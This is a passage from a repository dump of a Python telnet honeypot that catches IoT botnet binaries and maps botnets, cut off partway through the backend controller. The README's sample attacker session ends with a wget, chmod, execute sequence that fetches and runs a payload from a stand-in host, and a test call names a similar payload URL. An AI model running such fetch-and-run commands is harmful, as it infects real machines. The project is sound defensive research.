Repository: Phype/telnet-iot-honeypot
Branch: master
Commit: 5d32829a36b5
Files: 82
Total size: 309.8 KB
Directory structure:
gitextract_2jzluwq6/
├── .gitignore
├── Dockerfile
├── INSTALL.md
├── README.md
├── backend/
│ ├── __init__.py
│ ├── additionalinfo.py
│ ├── authcontroller.py
│ ├── backend.py
│ ├── clientcontroller.py
│ ├── cuckoo.py
│ ├── db.py
│ ├── ipdb/
│ │ ├── .gitignore
│ │ ├── __init__.py
│ │ └── ipdb.py
│ ├── virustotal.py
│ ├── virustotal_fill_db.py
│ └── webcontroller.py
├── backend.py
├── config.dist.yaml
├── create_config.sh
├── create_docker.sh
├── honeypot/
│ ├── __init__.py
│ ├── __main__.py
│ ├── client.py
│ ├── sampledb_client.py
│ ├── session.py
│ ├── shell/
│ │ ├── __init__.py
│ │ ├── commands/
│ │ │ ├── __init__.py
│ │ │ ├── base.py
│ │ │ ├── binary.py
│ │ │ ├── cmd_util.py
│ │ │ ├── shell.py
│ │ │ ├── shellcode.py
│ │ │ ├── tftp.py
│ │ │ └── wget.py
│ │ ├── grammar.peg
│ │ ├── grammar.py
│ │ ├── shell.py
│ │ ├── test.sh
│ │ └── test.txt
│ └── telnet.py
├── honeypot.py
├── html/
│ ├── .gitignore
│ ├── admin.html
│ ├── asn.html
│ ├── common.js
│ ├── connection.html
│ ├── connectionlist-embed.html
│ ├── connectionlist.html
│ ├── countries.js
│ ├── fancy/
│ │ ├── connhash/
│ │ │ └── index.html
│ │ └── graph/
│ │ └── index.html
│ ├── img/
│ │ ├── LICENSE
│ │ └── flags/
│ │ └── LICENSE
│ ├── index.html
│ ├── js/
│ │ └── angular-vis.js
│ ├── network.html
│ ├── networks.html
│ ├── overview.html
│ ├── sample.html
│ ├── sample.js
│ ├── samples.html
│ ├── tag.html
│ ├── tags.html
│ ├── url.html
│ └── urls.html
├── requirements.txt
├── tftpy/
│ ├── TftpClient.py
│ ├── TftpContexts.py
│ ├── TftpPacketFactory.py
│ ├── TftpPacketTypes.py
│ ├── TftpServer.py
│ ├── TftpShared.py
│ ├── TftpStates.py
│ └── __init__.py
├── util/
│ ├── __init__.py
│ ├── config.py
│ └── dbg.py
└── vagrant/
├── .gitignore
├── mariadb/
│ ├── Vagrantfile
│ └── mysql.sh
└── sqlite/
└── Vagrantfile
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
*.pyc
*.db
samples/
Mirai-Source-Code-master/
obf.py
import-lost-conns.py
import-length.py
review-sampels.py
*.kate-swp
*.sql
*.log
config.yaml
================================================
FILE: Dockerfile
================================================
FROM python:2
WORKDIR /usr/src/app
COPY ./requirements.txt ./
RUN pip install --no-cache-dir -r requirements.txt
RUN pip install mysqlclient
COPY . .
RUN apt update && apt install -y sqlite3
================================================
FILE: INSTALL.md
================================================
# Installation
For installation instructions, see the section Manual installation.
However, if you just want to get everything running, there is
also a Vagrantfile; see the section Vagrant for that.
# Vagrant
There is a Vagrantfile in the folder vagrant/ you can use to make
a basic deployment with honeypot + backend + sqlite running.
Install vagrant and the vagrant virtualbox provider,
then go to the vagrant folder and type `vagrant up`.
After a while the box should run a honeypot + backend, available
via port-forwarding at `http://localhost:5000/` and `telnet://localhost:2223`.
# Manual installation
Confirmed to work with Ubuntu 16.04.2 LTS.
Install all requirements:
```
apt-get install -y python-pip libmysqlclient-dev python-mysqldb git sqlite3
git clone https://github.com/Phype/telnet-iot-honeypot.git
cd telnet-iot-honeypot
pip install -r requirements.txt
```
Alternatively, the Python dependencies can be installed as system packages:
```
sudo apt-get install python-setuptools python-werkzeug \
python-flask python-flask-httpauth python-sqlalchemy \
python-requests python-decorator python-dnspython \
python-ipaddress python-simpleeval python-yaml
```
If you want to use MySQL, create a MySQL database first. The default MySQL max key length
is 767 bytes, so it is recommended to use the latin1 charset, otherwise the db setup will fail.
```
apt-get install mysql-server mysql-client
sudo mysql_secure_installation
mysql
CREATE DATABASE telhoney CHARACTER SET latin1 COLLATE latin1_swedish_ci;
grant all privileges on telhoney.* to telhoney@localhost identified by "YOUR_PASSWORD";
flush privileges;
```
## Configuration
This software consists of two components: a honeypot (client) and a backend (server).
The honeypot accepts incoming telnet connections and downloads samples
that an adversary tries to fetch during the telnet session. When a session is
closed, the honeypot posts all data about the connection to the backend using
a REST API.
The configuration for both honeypot and backend is in the files
`config.dist.yaml` and `config.yaml`. The `config.dist.yaml` contains the default
config. If you want to change anything, change or create overriding entries in
`config.yaml`. If you need documentation about the configuration,
the file `config.dist.yaml` contains some comments.
The REST API requires authentication (HTTP Basic Auth).
When the backend is started for the first time,
it will create a "users" table in the database containing an "admin" user.
The admin user's password is read from the configuration file.
If this file is empty, it will be created with random credentials.
*TL;DR*: The default config should just work; if you need the credentials for the
admin user, see the file `config.yaml`.
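As an illustration, a minimal `config.yaml` overriding the defaults might look like this (the values are placeholders, not real defaults; see `config.dist.yaml` for the full list of keys):
```yaml
# config.yaml -- local overrides for config.dist.yaml (placeholder values)
backend_user: "admin"
backend_pass: "CHANGE_ME"
submit_to_vt: false
```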
## Running
Create a config:
```
bash create_config.sh
```
Start the backend:
```
python backend.py
```
Now, start the honeypot:
```
python honeypot.py
```
Now you can test the honeypot:
```
telnet 127.0.0.1 2223
```
## HTML Frontend
You can use the frontend by just opening the file html/index.html in your browser.
If you want to make the frontend publicly available, deploy the html/ folder to your webserver,
or install one:
```
sudo apt-get install apache2
cd telnet-iot-honeypot
cp -R html /var/www
sudo chown www-data:www-data /var/www -R
```
## Virustotal integration
Please get your own virustotal key,
since mine only allows for 4 API requests/min.
For how to do this, see https://www.virustotal.com/de/faq/#virustotal-api
When you have one, put it in your config.yaml and enable virustotal integration:
```
vt_key: "GET_YOUR_OWN"
submit_to_vt: true
```
If you want to import virustotal reports of the collected samples,
run (you may have to restart because of db locks; *TODO*: test if this still works):
```
python virustotal_fill_db.py
```
================================================
FILE: README.md
================================================
## Disclaimer
This project is neither supported nor in development anymore. It is based on Python 2, which reached its end of life in 2020, and uses dependencies which are getting harder to install over time. Use at your own risk!
# Telnet IoT honeypot
'Python telnet honeypot for catching botnet binaries'
This project implements a python telnet server trying to act
as a honeypot for IoT malware, which spreads over horribly
insecure default passwords on telnet servers on the internet.
The honeypot works by emulating a shell environment, just like
cowrie (https://github.com/micheloosterhof/cowrie).
The aim of this project is primarily to automatically analyse
botnet connections and "map" botnets by linking different
connections and even networks together.
## Architecture
The application has a client/server architecture,
with a client (the actual honeypot) accepting telnet connections
and a server which receives information about connections and
does the analysis.
The backend server exposes an HTTP interface which is used
to access the frontend as well as by the clients to push new
connection information to the backend.
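As an illustration (field names below match what the backend's `put_session()` handler reads; the values are made up), a client pushes a finished session to the backend's `PUT /conns` endpoint as JSON roughly like this:
```json
{
  "ip": "198.51.100.7",
  "user": "root",
  "pass": "123456",
  "date": 1500000000,
  "stream": [
    { "in": true,  "data": "cat /proc/mounts; /bin/busybox PEGOK\r\n" },
    { "in": false, "data": "PEGOK\r\n" }
  ],
  "samples": [
    { "url": "http://example.com:4636/.i", "sha256": null,
      "name": ".i", "length": 0, "date": 1500000000, "info": "" }
  ]
}
```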
## Automatic analysis
The backend uses two different mechanisms to automatically link
connections:
### Networks
Networks are discovered botnets. A network is the set of all linked
connections, urls and samples. Urls and samples
are linked when they are used in a connection. Two connections are linked
when both connections are received by the same honeypot client
(multiple clients are supported!) and use the same credentials within a short
period of time (default 2 minutes), or when they come from the same IP address.
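In code, the linking rule amounts to a predicate like the following (a simplified Python 3 sketch of the checks in `ClientController.put_session()`; note the backend actually uses a longer window of 3600 s for the same-IP case, and the dict field names here are illustrative):

```python
ASSOC_TIMEDIFF = 120          # same-credentials window (seconds), as in the backend
ASSOC_TIMEDIFF_SAMEIP = 3600  # same-source-IP window (seconds), as in the backend

def are_linked(a, b):
    """a, b: dicts with keys 'client', 'date' (unix time), 'user', 'password', 'ip'."""
    if a["client"] != b["client"]:  # must be seen by the same honeypot client
        return False
    dt = abs(a["date"] - b["date"])
    same_creds = (dt <= ASSOC_TIMEDIFF and
                  a["user"] == b["user"] and a["password"] == b["password"])
    same_ip = dt <= ASSOC_TIMEDIFF_SAMEIP and a["ip"] == b["ip"]
    return same_creds or same_ip
```

Any connection satisfying this predicate against a known connection is pulled into the same network.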
### Malware
Multiple networks are identified as using the same type of malware
if the text entered during sessions of those networks is mostly the
same. This comparison is done using a sort of "hash" function which
translates a session (or connection) into a sequence
of words and then maps each word to a single byte, so the resulting
sequence of bytes can be searched easily.
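The idea can be sketched as follows (a simplified Python 3 version of the backend's `calc_connhash()` and `calc_connhash_similiarity()`; the backend's similarity score is really a *dissimilarity*, where 0.0 means identical word sequences, and it declares two networks to run the same malware when the score is low enough):

```python
def connhash(lines):
    # Map every whitespace-separated word of the attacker's input
    # to a single byte, so whole sessions compare cheaply.
    out = bytearray()
    for line in lines:
        for word in line.strip().split():
            out.append(hash(word) % 0xFF)
    return bytes(out[:120])  # cap the length, as the backend does

def dissimilarity(h1, h2):
    # Fraction of differing bytes over the shorter hash; 0.0 = identical.
    n = min(len(h1), len(h2))
    if n == 0:
        return 0.0
    return sum(x != y for x, y in zip(h1, h2)) / n
```

Note that Python's built-in `hash()` is randomized per process, so these byte strings are only comparable within one run; the backend hashes every session in the same process before storing the result.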
# Running
The application reads its configuration from `config.yaml`, with defaults in
`config.dist.yaml`, covering both local and client/server deployments.
## Configuration
The backend requires a SQL database (sqlite by default) which is initialized
at first run. Before the first run you should generate an admin account,
which is used to create more users. The admin account can also be used directly
by a client to post connections. When more than one honeypot shall be
connected, creating multiple users is recommended.
```
bash create_config.sh
```
Both client and backend read the files `config.yaml` and `config.dist.yaml`
for configuration parameters. The `config.dist.yaml` file includes
default values for everything except the admin user credentials; these defaults
are overridden by entries in the `config.yaml` file.
## Running the Server
```
python backend.py
```
## Running the Client
This project contains its own honeypot; however, because of the client-server architecture,
other honeypots can be used as well.
### Using the built-in honeypot
```
python honeypot.py
```
The client cannot be started without the server running. To use a different configuration
for the client, use the `-c` switch like this:
```
python honeypot.py -c myconfig.yaml
```
If you only want to check the honeypot functionality,
you can start the client in interactive mode:
```
python honeypot shell
```
### Using cowrie
I wrote an output plugin for cowrie, which has many more features than the built-in honeypot.
If you want to use cowrie instead, check out my fork, which includes the output module:
https://github.com/Phype/cowrie
## Opening the frontend
After the server is started, open `http://127.0.0.1:5000/` in your favorite browser.
## Sample Connection
```
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit
```
================================================
FILE: backend/__init__.py
================================================
================================================
FILE: backend/additionalinfo.py
================================================
import dns.resolver
import ipaddress
import urlparse
import re
import traceback

import ipdb.ipdb

def filter_ascii(string):
	string = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in "\r\n ")
	return string

def query_txt(cname):
	try:
		answer = dns.resolver.query(filter_ascii(cname), "TXT")
		for rr in answer.rrset:
			if rr.strings: return rr.strings[0]
	except Exception as e:
		traceback.print_exc()
	return None

def query_a(cname):
	try:
		answer = dns.resolver.query(filter_ascii(cname), "A")
		for data in answer:
			if data.address: return data.address
	except:
		traceback.print_exc()
	return None

def txt_to_ipinfo(txt):
	parts = txt.split("|")
	return {
		"asn":     filter_ascii(parts[0].strip()),
		"ipblock": filter_ascii(parts[1].strip()),
		"country": filter_ascii(parts[2].strip()),
		"reg":     filter_ascii(parts[3].strip()),
		"updated": filter_ascii(parts[4].strip())
	}

def txt_to_asinfo(txt):
	parts = txt.split("|")
	return {
		"asn":     filter_ascii(parts[0].strip()),
		"country": filter_ascii(parts[1].strip()),
		"reg":     filter_ascii(parts[2].strip()),
		"updated": filter_ascii(parts[3].strip()),
		"name":    filter_ascii(parts[4].strip())
	}

def get_ip4_info(ip):
	oktets = ip.split(".")
	reverse = oktets[3] + "." + oktets[2] + "." + oktets[1] + "." + oktets[0]
	answer = query_txt(reverse + ".origin.asn.cymru.com")
	if answer:
		return txt_to_ipinfo(answer)
	return None

def get_ip6_info(ip):
	ip = ipaddress.ip_address(unicode(ip))
	ip = list(ip.exploded.replace(":", ""))
	ip.reverse()
	reverse = ".".join(ip)
	answer = query_txt(reverse + ".origin6.asn.cymru.com")
	if answer:
		return txt_to_ipinfo(answer)
	return None

def get_ip_info(ip):
	is_v4 = "." in ip
	is_v6 = ":" in ip
	if is_v4:
		return get_ip4_info(ip)
	elif is_v6:
		return get_ip6_info(ip)
	else:
		print("Cannot parse ip " + ip)
		return None

def get_asn_info(asn):
	answer = query_txt("AS" + str(asn) + ".asn.cymru.com")
	if answer:
		return txt_to_asinfo(answer)
	return None

def get_url_info(url):
	try:
		parsed = urlparse.urlparse(url)
		netloc = parsed.netloc
		ip = None

		# IPv6
		if "[" in netloc:
			netloc = re.match("\\[(.*)\\]", netloc).group(1)
			ip = netloc
		# IPv4 / domain name
		else:
			if ":" in netloc:
				netloc = re.match("(.*?):", netloc).group(1)
			if re.match("[a-zA-Z]", netloc):
				ip = query_a(netloc)
			else:
				ip = netloc

		return ip, get_ip_info(ip)
	except:
		traceback.print_exc()
	return None

if __name__ == "__main__":
	print get_ip_info("79.220.249.125")
	print get_ip_info("2a00:1450:4001:81a::200e")
	print get_asn_info(3320)
	print get_url_info("http://google.com")
	print get_url_info("http://183.144.16.51:14722/.i")
	print get_url_info("http://[::1]:14722/.i")
================================================
FILE: backend/authcontroller.py
================================================
import os
import hashlib
import traceback
import struct
import json
import time

import additionalinfo
import ipdb.ipdb

from sqlalchemy import desc, func, and_, or_
from decorator import decorator
from functools import wraps
from simpleeval import simple_eval
from argon2 import argon2_hash

from db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper
from virustotal import Virustotal
from cuckoo import Cuckoo

from util.dbg import dbg
from util.config import config

from difflib import ndiff

class AuthController:

	def __init__(self):
		self.session = None
		self.salt = config.get("backend_salt")
		self.checkInitializeDB()

	def pwhash(self, username, password):
		return argon2_hash(str(password), self.salt + str(username), buflen=32).encode("hex")

	@db_wrapper
	def checkInitializeDB(self):
		user = self.session.query(User).filter(User.id == 1).first()
		if user == None:
			admin_name = config.get("backend_user")
			admin_pass = config.get("backend_pass")
			print 'Creating admin user "' + admin_name + '" see config for password'
			self.addUser(admin_name, admin_pass, 1)

	@db_wrapper
	def getUser(self, username):
		user = self.session.query(User).filter(User.username == username).first()
		return user.json(depth=1) if user else None

	@db_wrapper
	def addUser(self, username, password, id=None):
		user = User(username=username, password=self.pwhash(username, password))
		if id != None:
			user.id = id
		self.session.add(user)
		return user.json()

	@db_wrapper
	def checkAdmin(self, user):
		user = self.session.query(User).filter(User.username == user).first()
		if user == None:
			return False
		return user.id == 1

	@db_wrapper
	def checkLogin(self, username, password):
		user = self.session.query(User).filter(User.username == username).first()
		if user == None:
			return False
		if self.pwhash(username, password) == user.password:
			return True
		else:
			return False
================================================
FILE: backend/backend.py
================================================
from flask import Flask, request, Response, redirect, send_from_directory
from flask_httpauth import HTTPBasicAuth
from flask_socketio import SocketIO

auth = HTTPBasicAuth()

from db import get_db
from clientcontroller import ClientController
from webcontroller import WebController
from authcontroller import AuthController
from util.config import config

import os
import json
import base64
import time
import signal

app = Flask(__name__)
ctrl = ClientController()
web = WebController()
authctrl = AuthController()
socketio = SocketIO(app)

app.debug = True

def red(obj, attributes):
	if not obj:
		return None
	res = {}
	for a in attributes:
		if a in obj:
			res[a] = obj[a]
	return res

###
#
# Globals
#
###

SECS_PER_MONTH = 3600 * 24 * 31

@app.after_request
def add_cors(response):
	response.headers["Access-Control-Allow-Origin"] = "*"
	response.headers["Access-Control-Allow-Methods"] = "GET, POST, PUT, DELETE"
	response.headers["Access-Control-Allow-Headers"] = "Authorization, Content-type"
	return response

@auth.verify_password
def verify_password(username, password):
	return authctrl.checkLogin(username, password)

###
#
# Index
#
###

@app.route('/')
def send_index():
	return redirect('/html/index.html')

@app.route('/html/<path:filename>')
def serve_static(filename):
	root_dir = os.getcwd()
	return send_from_directory(os.path.join(root_dir, 'html'), filename)

###
#
# Admin API
#
###

@app.route("/user/<username>", methods = ["PUT"])
@auth.login_required
def add_user(username):
	if authctrl.checkAdmin(auth.username()):
		user = request.json
		if user["username"] != username:
			return "username mismatch in url/data", 500
		return json.dumps(authctrl.addUser(user["username"], user["password"]))
	else:
		return "Authorization required", 401

###
#
# Upload API
#
###

@app.route("/login")
@auth.login_required
def test_login():
	return "LOGIN OK"

@app.route("/conns", methods = ["PUT"])
@auth.login_required
def put_conn():
	session = request.json
	session["backend_username"] = auth.username()
	print("--- PUT SESSION ---")
	print(json.dumps(session))
	session = ctrl.put_session(session)
	socketio.emit('session', session)
	return json.dumps(session)

@app.route("/sample/<sha256>", methods = ["PUT"])
@auth.login_required
def put_sample_info(sha256):
	sample = request.json
	return json.dumps(ctrl.put_sample_info(sample))

@app.route("/sample/<sha256>/update", methods = ["GET"])
@auth.login_required
def update_sample(sha256):
	return json.dumps(ctrl.update_vt_result(sha256))

@app.route("/file", methods = ["POST"])
@auth.login_required
def put_sample():
	data = request.get_data()
	return json.dumps(ctrl.put_sample(data))

###
#
# Public API
#
###

def fail(msg = "", code = 400):
	obj = {"ok" : False, "msg" : msg}
	return Response(json.dumps(obj), status=code, mimetype='application/json')

### Networks

@app.route("/housekeeping", methods = ["GET"])
def housekeeping():
	ctrl.do_housekeeping()
	return "DONE"

@app.route("/networks", methods = ["GET"])
def get_networks():
	return json.dumps(web.get_networks())

@app.route("/network/<net_id>", methods = ["GET"])
def get_network(net_id):
	return json.dumps(web.get_network(net_id))

@app.route("/network/<net_id>/locations", methods = ["GET"])
def get_network_locations(net_id):
	now = int(time.time())
	loc = web.get_connection_locations(now - SECS_PER_MONTH, now, int(net_id))
	return json.dumps(loc)

@app.route("/network/<net_id>/history", methods = ["GET"])
def get_network_history(net_id):
	not_before = request.args.get("not_before")
	not_after = request.args.get("not_after")
	if not_before == None or not_after == None:
		not_after = int(time.time())
		not_before = not_after - SECS_PER_MONTH
	else:
		not_before = int(not_before)
		not_after = int(not_after)
	d = web.get_network_history(not_before, not_after, int(net_id))
	return json.dumps(d)

@app.route("/network/biggest_history", methods = ["GET"])
def get_network_biggest_history():
	not_before = request.args.get("not_before")
	not_after = request.args.get("not_after")
	if not_before == None or not_after == None:
		not_after = int(time.time())
		not_before = not_after - SECS_PER_MONTH
	else:
		not_before = int(not_before)
		not_after = int(not_after)
	d = web.get_biggest_networks_history(not_before, not_after)
	return json.dumps(d)

### Malwares

@app.route("/malwares", methods = ["GET"])
def get_malwares():
	return json.dumps(web.get_malwares())

### Samples

@app.route("/sample/<sha256>")
def get_sample(sha256):
	sample = web.get_sample(sha256)
	if sample:
		return json.dumps(sample)
	else:
		return "", 404

@app.route("/sample/newest")
def get_newest_samples():
	samples = web.get_newest_samples()
	return json.dumps(samples)

### Urls

@app.route("/url/<ref_enc>", methods = ["GET"])
def get_url(ref_enc):
	ref = base64.b64decode(ref_enc)
	print("\"" + ref_enc + "\" decodes to \"" + ref + "\"")
	url = web.get_url(ref)
	if url:
		return json.dumps(url)
	else:
		return "", 404

@app.route("/url/newest")
def get_newest_urls():
	urls = web.get_newest_urls()
	return json.dumps(urls)

### connections

@app.route("/connection/<id>")
def get_connection(id):
	conn = web.get_connection(id)
	if conn:
		return json.dumps(conn)
	else:
		return "", 404

@app.route("/connections")
def get_connections():
	obj = {}
	allowed_keys = ["ipblock", "user", "password", "ip", "country", "asn_id", "network_id"]
	for k, v in request.args.iteritems():
		if k in allowed_keys:
			obj[k] = v
	conn = web.get_connections(obj, request.args.get("older_than", None))
	if conn:
		return json.dumps(conn)
	else:
		return "", 404

@app.route("/connections_fast")
def get_connections_fast():
	conn = web.get_connections_fast()
	if conn:
		return json.dumps(conn)
	else:
		return "", 404

@app.route("/connection/statistics/per_country")
def get_country_stats():
	stats = web.get_country_stats()
	return json.dumps(stats)

@app.route("/connection/by_country/<country>")
def get_country_connections(country):
	older_than = request.args.get('older_than', None)
	stats = web.get_country_connections(country, older_than)
	return json.dumps(stats)

@app.route("/connection/by_ip/<ip>")
def get_ip_connections(ip):
	older_than = request.args.get('older_than', None)
	stats = web.get_ip_connections(ip, older_than)
	return json.dumps(stats)

@app.route("/connection/newest")
def get_newest_connections():
	connections = web.get_newest_connections()
	return json.dumps(connections)

@app.route("/connection/locations")
def get_connection_locations():
	now = int(time.time())
	loc = web.get_connection_locations(now - SECS_PER_MONTH, now)
	return json.dumps(loc)

### Tags

@app.route("/tag/<name>")
def get_tag(name):
	tag = web.get_tag(name)
	if tag:
		return json.dumps(tag)
	else:
		return "", 404

@app.route("/tags")
def get_tags():
	tags = web.get_tags()
	return json.dumps(tags)

### Hist

@app.route("/connhashtree/<layers>")
def connhash_tree(layers):
	return json.dumps(web.connhash_tree(int(layers)))

### ASN

@app.route("/asn/<asn>")
def get_asn(asn):
	info = web.get_asn(asn)
	if not info:
		return "", 404
	return json.dumps(info)

def run():
	signal.signal(15, stop)
	app.run(host=config.get("http_addr"), port=config.get("http_port"), threaded=True)
	#socketio.run(app, host=config.get("http_addr"), port=config.get("http_port"))

# Signal handlers are called with (signum, frame)
def stop(signum, frame):
	print "asdasdasd"

if __name__ == "__main__":
	run()
================================================
FILE: backend/clientcontroller.py
================================================
import os
import hashlib
import traceback
import struct
import json
import time
import socket
import urlparse
import random
import additionalinfo
import ipdb.ipdb
from sqlalchemy import desc, func, and_, or_
from decorator import decorator
from functools import wraps
from simpleeval import simple_eval
from argon2 import argon2_hash
from db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper
from virustotal import Virustotal
from cuckoo import Cuckoo
from util.dbg import dbg
from util.config import config
from difflib import ndiff
ANIMAL_NAMES = ["Boar","Stallion","Yak","Beaver","Salamander","Eagle Owl","Impala","Elephant","Chameleon","Argali","Lemur","Addax","Colt",
"Whale","Dormouse","Budgerigar","Dugong","Squirrel","Okapi","Burro","Fish","Crocodile","Finch","Bison","Gazelle","Basilisk",
"Puma","Rooster","Moose","Musk Deer","Thorny Devil","Gopher","Gnu","Panther","Porpoise","Lamb","Parakeet","Marmoset","Coati",
"Alligator","Elk","Antelope","Kitten","Capybara","Mule","Mouse","Civet","Zebu","Horse","Bald Eagle","Raccoon","Pronghorn",
"Parrot","Llama","Tapir","Duckbill Platypus","Cow","Ewe","Bighorn","Hedgehog","Crow","Mustang","Panda","Otter","Mare",
"Goat","Dingo","Hog","Mongoose","Guanaco","Walrus","Springbok","Dog","Kangaroo","Badger","Fawn","Octopus","Buffalo","Doe",
"Camel","Shrew","Lovebird","Gemsbok","Mink","Lynx","Wolverine","Fox","Gorilla","Silver Fox","Wolf","Ground Hog","Meerkat",
"Pony","Highland Cow","Mynah Bird","Giraffe","Cougar","Eland","Ferret","Rhinoceros"]
# Controls Actions perfomed by Honeypot Clients
class ClientController:
def __init__(self):
self.session = None
if config.get("submit_to_vt"):
self.vt = Virustotal(config.get("vt_key", optional=True))
else:
self.vt = None
self.cuckoo = Cuckoo(config)
self.do_ip_to_asn_resolution = False
self.ip2asn = config.get("ip_to_asn_resolution", optional=True, default=True)
if self.ip2asn == "offline":
self.do_ip_to_asn_resolution = True
self.fill_db_ipranges()
if self.ip2asn == "online":
self.do_ip_to_asn_resolution = True
@db_wrapper
def _get_asn(self, asn_id):
asn_obj = self.session.query(ASN).filter(ASN.asn == asn_id).first()
if asn_obj:
return asn_obj
else:
asn_info = additionalinfo.get_asn_info(asn_id)
if asn_info:
asn_obj = ASN(asn=asn_id, name=asn_info['name'], reg=asn_info['reg'], country=asn_info['country'])
self.session.add(asn_obj)
return asn_obj
return None
def calc_connhash_similiarity(self, h1, h2):
l = min(len(h1), len(h2))
r = 0
for i in range(0, l):
r += int(h1[i] != h2[i])
if l == 0: return 0
return float(r)/float(l)
def calc_connhash(self, stream):
output = ""
for event in stream:
if event["in"]:
line = event["data"]
line = line.strip()
parts = line.split(" ")
for part in parts:
part_hash = chr(hash(part) % 0xFF)
output += part_hash
# Max db len is 256, half because of hex encoding
return output[:120]
@db_wrapper
def fill_db_ipranges(self):
if self.session.query(IPRange.ip_min).count() != 0:
return
print "Filling IPRange Tables"
asntable = ipdb.ipdb.get_asn()
progress = 0
for row in ipdb.ipdb.get_geo_iter():
progress += 1
if progress % 1000 == 0:
self.session.commit()
self.session.flush()
print str(100.0 * float(row[0]) / 4294967296.0) + "% / " + str(100.0 * progress / 3315466) + "%"
ip = IPRange(ip_min = int(row[0]), ip_max=int(row[1]))
ip.country = row[2]
ip.region = row[4]
ip.city = row[5]
ip.zipcode = row[8]
ip.timezone = row[9]
ip.latitude = float(row[6])
ip.longitude = float(row[7])
asn_data = asntable.find_int(ip.ip_min)
if asn_data:
asn_id = int(asn_data[3])
asn_db = self.session.query(ASN).filter(ASN.asn == asn_id).first()
if asn_db == None:
asn_db = ASN(asn = asn_id, name = asn_data[4], country=ip.country)
self.session.add(asn_db)
ip.asn = asn_db
# Dont add session if we cannot find an asn for it
self.session.add(ip)
print "IPranges loaded"
@db_wrapper
def get_ip_range_offline(self, ip):
ip_int = ipdb.ipdb.ipstr2int(ip)
range = self.session.query(IPRange).filter(and_(IPRange.ip_min <= ip_int,
ip_int <= IPRange.ip_max)).first()
return range
def get_ip_range_online(self, ip):
addinfo = additionalinfo.get_ip_info(ip)
if addinfo:
# TODO: Ugly hack
range = type('',(object,),{})()
range.country = addinfo["country"]
range.city = "Unknown"
range.latitude = 0
range.longitude = 0
range.asn_id = int(addinfo["asn"])
range.asn = self._get_asn(range.asn_id)
range.cidr = addinfo["ipblock"]
return range
else:
return None
def get_ip_range(self, ip):
if self.ip2asn == "online":
return self.get_ip_range_online(ip)
else:
return self.get_ip_range_offline(ip)
def get_url_info(self, url):
parsed = urlparse.urlparse(url)
host = parsed.netloc.split(':')[0]
if host[0].isdigit():
ip = host
else:
try:
ip = socket.gethostbyname(host)
except:
return None
range = self.get_ip_range(ip)
return ip, range
@db_wrapper
def do_housekeeping(self):
for malware in self.session.query(Malware).all():
malware.name = random.choice(ANIMAL_NAMES)
# rebuild nb_firstconns
if False:
net_cache = {}
for conn in self.session.query(Connection).all():
if len(conn.conns_before) == 0:
if conn.network_id in net_cache:
net_cache[conn.network_id] += 1
else:
net_cache[conn.network_id] = 1
for network in self.session.query(Network).all():
if network.id in net_cache:
network.nb_firstconns = net_cache[network.id]
else:
network.nb_firstconns = 0
print "Net " + str(network.id) + ": " + str(network.nb_firstconns)
@db_wrapper
def put_session(self, session):
connhash = self.calc_connhash(session["stream"]).encode("hex")
backend_user = self.session.query(User).filter(
User.username == session["backend_username"]).first()
conn = Connection(ip=session["ip"], user=session["user"],
date=session["date"], password=session["pass"],
stream=json.dumps(session["stream"]),
connhash=connhash, backend_user_id=backend_user.id)
conn.user = filter_ascii(conn.user)
conn.password = filter_ascii(conn.password)
if self.do_ip_to_asn_resolution:
range = self.get_ip_range(conn.ip)
if range:
conn.country = range.country
conn.city = range.city
conn.lat = range.latitude
conn.lon = range.longitude
conn.asn = range.asn
self.session.add(conn)
self.session.flush() # to get id
network_id = None
samples = []
urls = []
for sample_json in session["samples"]:
# Ignore junk - may clean up the db a bit
if sample_json["length"] < 2000:
continue
sample, url = self.create_url_sample(sample_json)
if sample:
if network_id == None and sample.network_id != None:
network_id = sample.network_id
samples.append(sample)
if url:
if network_id == None and url.network_id != None:
network_id = url.network_id
conn.urls.append(url)
urls.append(url)
# Find previous connections
# A connection is associated when:
# - same honeypot/user
# - connection happened as long as 120s before
# - same client ip OR same username/password combo
assoc_timediff = 120
assoc_timediff_sameip = 3600
previous_conns = (self.session.query(Connection).
filter(
or_(
and_(
Connection.date > (conn.date - assoc_timediff),
Connection.user == conn.user,
Connection.password == conn.password
),
and_(
Connection.date > (conn.date - assoc_timediff_sameip),
Connection.ip == conn.ip
)
),
Connection.backend_user_id == conn.backend_user_id,
Connection.id != conn.id).all())
for prev in previous_conns:
if network_id == None and prev.network_id != None:
network_id = prev.network_id
conn.conns_before.append(prev)
# Check connection against all tags
tags = self.session.query(Tag).all()
for tag in tags:
json_obj = conn.json(depth = 0)
json_obj["text_combined"] = filter_ascii(json_obj["text_combined"])
if simple_eval(tag.code, names=json_obj) == True:
self.db.link_conn_tag(conn.id, tag.id)
# Only create new networks for connections with urls or associtaed conns,
# to prevent the creation of thousands of networks
# NOTE: only conns with network == NULL will get their network updated
# later so whe should only create a network where we cannot easily
# change it later
haslogin = conn.user != None and conn.user != ""
if (len(conn.urls) > 0 or len(previous_conns) > 0) and network_id == None and haslogin:
print(" --- create network --- ")
network_id = self.create_network().id
# Update network on self
conn.network_id = network_id
# Update network on all added Urls
for url in urls:
if url.network_id == None:
url.network_id = network_id
# Update network on all added Samples
for sample in samples:
if sample.network_id == None:
sample.network_id = network_id
# Update network on all previous connections withut one
if network_id != None:
for prev in previous_conns:
if prev.network_id == None:
prev.network_id = network_id
# Update number of first conns on network
if len(prev.conns_before) == 0:
conn.network.nb_firstconns += 1
self.session.flush()
# Check for Malware type
# only if our network exists AND has no malware associated
if conn.network != None and conn.network.malware == None:
# Find connections with similar connhash
similar_conns = (self.session.query(Connection)
.filter(func.length(Connection.connhash) == len(connhash))
.all())
min_sim = 2
min_conn = None
for similar in similar_conns:
if similar.network_id != None:
c1 = connhash.decode("hex")
c2 = similar.connhash.decode("hex")
sim = self.calc_connhash_similiarity(c1, c2)
if sim < min_sim and similar.network.malware != None:
min_sim = sim
min_conn = similar
# min_sim < 0.9: 90% or more of the words in the session are equal,
# so this is probably the same kind of malware,
# though it doesn't need to be the same botnet
